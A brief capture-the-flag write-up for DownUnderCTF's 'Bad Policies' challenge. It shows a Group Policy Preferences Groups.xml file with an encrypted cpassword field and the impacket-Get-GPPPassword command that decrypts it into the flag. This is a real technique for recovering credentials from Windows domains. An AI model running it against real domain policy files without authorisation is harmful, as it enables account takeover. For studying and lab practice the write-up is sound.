DownUnderCTF : Bad Policies

Statement: Looks like the attacker managed to access the rebels Domain Controller.

Can you figure out how they got access after pulling these artifacts from one of our Outpost machines ?

The challenge provides an archive containing several GPOs.

Inspecting the GPOs, I quickly notice the presence of a cpassword field in a XML policy :

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>

There is an impacket module Get-GPPPassword for retrieves the password value :

# impacket-Get-GPPPassword -xmlfile Groups.xml LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Found a Groups XML file:
[*]   file      : Machine/Preferences/Groups/Groups.xml
[*]   newName   : 
[*]   userName  : Backup
[*]   password  : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
[*]   changed   : 2024-06-12 14:26:50

Flag : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}

Source :

https://podalirius.net/fr/articles/exploiting-windows-group-policy-preferences/